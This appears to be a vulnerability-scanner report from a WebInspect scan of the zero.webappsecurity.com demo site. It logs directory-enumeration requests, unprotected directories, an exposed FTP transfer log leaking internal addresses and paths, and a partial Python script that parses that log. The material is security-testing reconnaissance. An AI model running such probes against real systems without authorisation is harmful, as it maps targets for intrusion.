http://zero.webappsecurity.com:80/manager/html

Request:
GET /manager/html HTTP/1.1
Host: zero.webappsecurity.com
Referer: http://zero.webappsecurity.com:80/manager/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-RequestManager-Memo: Category="StateRequestor.Redirect"; TriggerID="ef3f998d-8124-4e90-b4b3-f9a91d1f6a3b"; sid="53";
smi="0"; sc="1"; ID="7a2b8d86-2551-4b54-8b44-9c6cf1856fd3";
X-Request-Memo: ID="a8959cac-20d1-40af-889e-9553f5e18bee"; sc="1"; ThreadId="108";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 401 Unauthorized
Date: Mon, 10 Oct 2016 07:51:12 GMT...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/admin/

Request:
GET /admin/ HTTP/1.1
Referer: http://zero.webappsecurity.com/resources/js/placeholders.min.js
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="B09C4D5CC22F10C01D9D84418780B93D";
PSID="511D6DB521E43A071D015EA7E62869D3"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="ae34b422-6357-4aca-8fe7-7e449e14c9b7"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="10210"; Engine="Directory+Enumeration";
SmartMode="NonServerSpecificOnly"; ThreadId="88"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="39"; smi="0"; sc="1"; ID="44b684c9-a38e-482f-b7ae-2cf445d55017";
X-Request-Memo: ID="797be3c0-690f-46e4-a978-485cb342bb23"; sc="1"; ThreadId="101";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:11 GMT
Server: ...TRUNCATED...

Web Server Misconfiguration: Unprotected Directory


Page:

description

http://zero.webappsecurity.com:80/backup/

Request:
GET /backup/ HTTP/1.1
Referer: http://zero.webappsecurity.com/resources/js/placeholders.min.js
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="B00CD470CE6F47816EAC8B94B3E4D1FC";
PSID="511D6DB521E43A071D015EA7E62869D3"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="ae34b422-6357-4aca-8fe7-7e449e14c9b7"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="10211"; Engine="Directory+Enumeration";
SmartMode="NonServerSpecificOnly"; ThreadId="88"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="39"; smi="0"; sc="1"; ID="e7914a6d-bf39-4abf-89d2-90c220d31ffa";
X-Request-Memo: ID="76d827f0-c596-4f1a-aee1-d06bd51ec5ed"; sc="1"; ThreadId="101";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 403 Forbidden
Date: Mon, 10 Oct 2016 07:51:13 GMT
S...TRUNCATED...

Web Server Misconfiguration: Unprotected Directory


Page:

description

http://zero.webappsecurity.com:80/scripts/

Request:
GET /scripts/ HTTP/1.1
Referer: http://zero.webappsecurity.com/resources/js/placeholders.min.js
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="8D695AA103CB5BFCC70FFF7C6062147A";
PSID="511D6DB521E43A071D015EA7E62869D3"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="ae34b422-6357-4aca-8fe7-7e449e14c9b7"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="10212"; Engine="Directory+Enumeration";
SmartMode="NonServerSpecificOnly"; ThreadId="88"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="51"; smi="0"; sc="1"; ID="831003a8-6362-49dc-9139-27971b407a19";
X-Request-Memo: ID="26b4513c-0fa0-46f2-9465-3e061e5d6534"; sc="1"; ThreadId="107";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 403 Forbidden
Date: Mon, 10 Oct 2016 07:51:16 GMT
S...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/cgi-bin/

Request:
GET /cgi-bin/ HTTP/1.1
Referer: http://zero.webappsecurity.com/resources/js/placeholders.min.js
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="4F59A2869EF7F0A2D7CD991C897978A2";
PSID="511D6DB521E43A071D015EA7E62869D3"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="ae34b422-6357-4aca-8fe7-7e449e14c9b7"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="10212"; Engine="Directory+Enumeration";
SmartMode="NonServerSpecificOnly"; ThreadId="88"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="47"; smi="0"; sc="1"; ID="39bf71f5-f6ed-494b-85b7-b2ed13e7bea0";
X-Request-Memo: ID="4eb5597d-fe76-49a6-9eb0-00bbaa89b896"; sc="1"; ThreadId="105";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 403 Forbidden
Date: Mon, 10 Oct 2016 07:51:14 GMT
S...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/htbin/

Request:
GET /htbin/ HTTP/1.1
Referer: http://zero.webappsecurity.com/resources/js/placeholders.min.js
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="06C0949C38AC94260BD0CEFB9FF67B42";
PSID="511D6DB521E43A071D015EA7E62869D3"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="ae34b422-6357-4aca-8fe7-7e449e14c9b7"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="10212"; Engine="Directory+Enumeration";
SmartMode="NonServerSpecificOnly"; ThreadId="88"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="45"; smi="0"; sc="1"; ID="8651bed3-7987-4343-ac3a-4b626bd79b39";
X-Request-Memo: ID="415282ad-05cd-4dd7-991c-b96aa0daa42b"; sc="1"; ThreadId="104";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 403 Forbidden
Date: Mon, 10 Oct 2016 07:51:15 GMT
S...TRUNCATED...

Web Server Misconfiguration: Unprotected Directory


Page:

description

http://zero.webappsecurity.com:80/include/

Request:
GET /include/ HTTP/1.1
Referer: http://zero.webappsecurity.com/resources/js/placeholders.min.js
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="B575CF6508C02A80B46DA672DF270F32";
PSID="511D6DB521E43A071D015EA7E62869D3"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="ae34b422-6357-4aca-8fe7-7e449e14c9b7"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="10214"; Engine="Directory+Enumeration";
SmartMode="NonServerSpecificOnly"; ThreadId="88"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="45"; smi="0"; sc="1"; ID="50320ba5-6830-4a9e-9e1f-c2877152caf9";
X-Request-Memo: ID="719f6775-3571-4ef4-9e77-035321c009db"; sc="1"; ThreadId="104";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 403 Forbidden
Date: Mon, 10 Oct 2016 07:51:18 GMT
S...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/errors/

Request:
GET /errors/ HTTP/1.1
Referer: http://zero.webappsecurity.com/resources/js/placeholders.min.js
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="BB23AC8A7B9C89C3DE9576C0FEACCA3F";
PSID="511D6DB521E43A071D015EA7E62869D3"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="ae34b422-6357-4aca-8fe7-7e449e14c9b7"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="10214"; Engine="Directory+Enumeration";
SmartMode="NonServerSpecificOnly"; ThreadId="88"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="43"; smi="0"; sc="1"; ID="80f80983-ecf1-439a-863c-27a58b849768";
X-Request-Memo: ID="2d21df20-9bb0-436e-a9b2-bb11433be3dd"; sc="1"; ThreadId="103";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:17 GMT
Server: ...TRUNCATED...

Web Server Misconfiguration: Unprotected Directory


Page:

description

http://zero.webappsecurity.com:80/db/

Request:
GET /db/ HTTP/1.1
Referer: http://zero.webappsecurity.com/resources/js/placeholders.min.js
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="B9AE01903B1D6483D2F28A9BB6CEC42B";
PSID="511D6DB521E43A071D015EA7E62869D3"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="ae34b422-6357-4aca-8fe7-7e449e14c9b7"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="10216"; Engine="Directory+Enumeration";
SmartMode="NonServerSpecificOnly"; ThreadId="88"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="47"; smi="0"; sc="1"; ID="ad596ec0-9acc-4b24-82ca-9bb3cce2ec7b";
X-Request-Memo: ID="18e1624d-6480-4851-aff4-c3e7bba46af9"; sc="1"; ThreadId="105";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 403 Forbidden
Date: Mon, 10 Oct 2016 07:51:24 GMT
S...TRUNCATED...

Web Server Misconfiguration: Unprotected Directory


Page:

description

http://zero.webappsecurity.com:80/testing/

Request:
GET /testing/ HTTP/1.1
Referer: http://zero.webappsecurity.com/resources/js/placeholders.min.js
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="893CA5890C66F16200F5520C0F46033A";
PSID="511D6DB521E43A071D015EA7E62869D3"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="ae34b422-6357-4aca-8fe7-7e449e14c9b7"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="10217"; Engine="Directory+Enumeration";
SmartMode="NonServerSpecificOnly"; ThreadId="88"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="43"; smi="0"; sc="1"; ID="ec28809d-2368-456e-9d24-338a1b701914";
X-Request-Memo: ID="ceab30e2-031b-4503-80f2-b3d81cf948b7"; sc="1"; ThreadId="103";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 403 Forbidden
Date: Mon, 10 Oct 2016 07:51:27 GMT
S...TRUNCATED...

Web Server Misconfiguration: Unprotected Directory


Page:

description

http://zero.webappsecurity.com:80/docs/

Request:
GET /docs/ HTTP/1.1
Referer: http://zero.webappsecurity.com/resources/js/placeholders.min.js
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="F123B9A3291354F97AC6F79540B0A325";
PSID="511D6DB521E43A071D015EA7E62869D3"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="ae34b422-6357-4aca-8fe7-7e449e14c9b7"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="10218"; Engine="Directory+Enumeration";
SmartMode="NonServerSpecificOnly"; ThreadId="88"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="47"; smi="0"; sc="1"; ID="9cc3750e-2cbb-4dd7-aca5-af08fb3677ce";
X-Request-Memo: ID="41b495e0-aabd-4c31-bd33-775eb1e270ea"; sc="1"; ThreadId="105";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:28 GMT
Server: ...TRUNCATED...

Web Server Misconfiguration: Unprotected Directory


Page:

description

http://zero.webappsecurity.com:80/stats/

Request:
GET /stats/ HTTP/1.1
Referer: http://zero.webappsecurity.com/resources/js/placeholders.min.js
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="0036DDD44B029BA89605F462C087D6CD";
PSID="511D6DB521E43A071D015EA7E62869D3"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="ae34b422-6357-4aca-8fe7-7e449e14c9b7"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="10229"; Engine="Directory+Enumeration";
SmartMode="NonServerSpecificOnly"; ThreadId="88"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="53"; smi="0"; sc="1"; ID="65f06df2-2161-4d6a-915b-060c08ee9794";
X-Request-Memo: ID="107df763-ccc8-40c8-9c35-fe8294bfd83f"; sc="1"; ThreadId="108";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 403 Forbidden
Date: Mon, 10 Oct 2016 07:51:41 GMT
S...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/error_log/

Request:
GET /error_log/ HTTP/1.1
Referer: http://zero.webappsecurity.com/resources/js/placeholders.min.js
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="3AAD17D0F26A97B041A9AED28823D7EF";
PSID="511D6DB521E43A071D015EA7E62869D3"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="ae34b422-6357-4aca-8fe7-7e449e14c9b7"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="10229"; Engine="Directory+Enumeration";
SmartMode="NonServerSpecificOnly"; ThreadId="88"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="49"; smi="0"; sc="1"; ID="fd7bdd43-fb4c-454d-9f3f-f505ede276d4";
X-Request-Memo: ID="d8147d81-f1b6-4198-88c6-9406b4bc7c22"; sc="1"; ThreadId="106";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 403 Forbidden
Date: Mon, 10 Oct 2016 07:51:40 GMT
S...TRUNCATED...

Web Server Misconfiguration: Unprotected Directory


Page:

description

http://zero.webappsecurity.com:80/user/

Request:
GET /user/ HTTP/1.1
Referer: http://zero.webappsecurity.com/resources/js/placeholders.min.js
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="6A1ED77117E1B16F946BCDF912E86C55";
PSID="511D6DB521E43A071D015EA7E62869D3"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="ae34b422-6357-4aca-8fe7-7e449e14c9b7"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="10233"; Engine="Directory+Enumeration";
SmartMode="NonServerSpecificOnly"; ThreadId="88"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="51"; smi="0"; sc="1"; ID="06255d2d-d94f-491e-a00f-4af2b186cf85";
X-Request-Memo: ID="b6ec7db2-1d5c-4538-b4a4-57b1f8f4023c"; sc="1"; ThreadId="107";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 403 Forbidden
Date: Mon, 10 Oct 2016 07:51:50 GMT
S...TRUNCATED...

Web Server Misconfiguration: Unprotected File


Page:

description

http://zero.webappsecurity.com:80/README.txt

Request:
GET /README.txt HTTP/1.1
Referer: http://zero.webappsecurity.com/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="A7014097004A822F436038B57058EAD5";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="AuditAttack"; CrawlType="None"; AttackType="None";
OriginatingEngineID="65cee7d3-561f-40dc-b5eb-c0b8c2383fcb"; AttackSequence="12"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="10342"; Engine="Request+Modify";
SmartMode="NonServerSpecificOnly"; ThreadId="83"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="41"; smi="0"; sc="1"; ID="74c8420e-6de3-4901-ac23-623a7bd1a62a";
X-Request-Memo: ID="305d1b88-9245-4575-b56e-7f19e29822b9"; sc="1"; ThreadId="102";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:15 GMT
Server: ...TRUNCATED...

Poor Error Handling: Unhandled Exception


Page:

description

http://zero.webappsecurity.com:80/docs/building.html

Request:
GET /docs/building.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="92BF4760E2D0FDCA4ABB18FC0B743B5E";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="4fede3ba-e46c-473f-8253-ef124324ef8f";
X-Request-Memo: ID="93076e7c-a2b4-4b9a-bfb5-cd5b632a4b75"; sc="1"; ThreadId="96";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:48 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"21672-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 21672
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
...TRUNCATED..."><pre><code># Location of Java 7 JDK
java.7.home=C:/Program Files (x86)/Java/jdk1.7.0_72</code></pre></...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/config/host.html

Request:
GET /docs/config/host.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/jndi-datasource-examples-howto.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="9BA142D4531EC16215DCD9F6E7E33584";
PSID="4005A3D0BF6D3E8BFED6DB64AB0C2F8D"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="e3dc82e3-8a3a-4298-8446-3d93674c2544";
X-Request-Memo: ID="5b7dd298-0e80-4a06-8917-818af40546db"; sc="1"; ThreadId="99";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:53:22 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"43300-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 43300
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
...TRUNCATED... in a specified base
directory (such as <code>c:\Homes</code> in this example) to be
considered...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/windows-service-howto.html

Request:
GET /docs/windows-service-howto.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="9BD235AA424324B5BDC5899093604D45";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="105ad3c1-28d2-4187-b7b2-14863f871084";
X-Request-Memo: ID="2b32fe4a-eddc-4517-9709-7b93ed3848e2"; sc="1"; ThreadId="98";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:34 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"27219-1466008848000"
Last-Modified: Wed, 15 Jun 2016 16:40:48 GMT
Content-Type: text/html
Content-Length: 27219
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
...TRUNCATED...
<div class="codeBox"><pre><code>set CATALINA_HOME=c:\tomcat_7
set CATALINA_BASE=c:\tomcat_7\instances\instance1
service install insta...TRUNCATED...
<div class="codeBox"><pre><code>set CATALINA_BASE=c:\tomcat_7\instances\instance2
service install insta...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/admin/WS_FTP.LOG

Request:
GET /admin/WS_FTP.LOG HTTP/1.1
Referer: http://zero.webappsecurity.com/admin/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="DC2EF0E7C935D7C47528CB0D2E9C1565";
PSID="B09C4D5CC22F10C01D9D84418780B93D"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="60b8f839-2e70-4177-8e47-f305852be435"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="764"; Engine="Site+Search";
SmartMode="NonServerSpecificOnly"; ThreadId="87"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="43"; smi="0"; sc="1"; ID="c47c8ae6-5758-42e7-82e9-f1558a268886";
X-Request-Memo: ID="807fe938-5c65-4f99-b66a-76c6511855c4"; sc="1"; ThreadId="103";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:38 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"504686-1368929102000"
Last-Modified: Sun, 19 May 2013 02:05:02 GMT
Content-Length: 504686
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/plain
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn C:\old_repo\root\oad\incoming\lorenzo\boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn C:\old_repo\root\oad\incoming\lorenzo\boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston
blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston
boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston
choices.h...TRUNCATED...
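The WS_FTP.LOG served from /admin/ above is a transfer log, and what it leaks is topology: a private client address, an internal host name and the local and remote deployment paths of whoever published the site. The script below inventories that from the captured lines. It is an added example, not WebInspect output and not code from zero.webappsecurity.com; SAMPLE_LOG re-joins four lines from the excerpt (the PDF wrapped the last field onto its own line), and the field layout it assumes, client / time / mode / local path / arrow / remote host / remote dir / remote file, is the example's own reading of those lines.

```python
"""Inventory what an exposed WS_FTP transfer log gives away.

Added example; it is neither WebInspect output nor code from the scanned
site. SAMPLE_LOG re-joins four lines from the /admin/WS_FTP.LOG excerpt
(the PDF wrapped the last field onto its own line). The field layout is
the example's own assumption:
  <client> <time> <A|B> <local path> <--|--> <remote host> <remote dir> <remote file>
"""
import ipaddress
import re
from typing import Dict, List, NamedTuple, Optional


class Transfer(NamedTuple):
    client: str
    time: str
    mode: str          # A = ASCII, B = binary
    local_path: str
    direction: str     # "download" for <--, "upload" for -->
    remote_host: str
    remote_dir: str
    remote_file: str


# The local path may contain spaces, so it is matched lazily up to the arrow.
LINE = re.compile(
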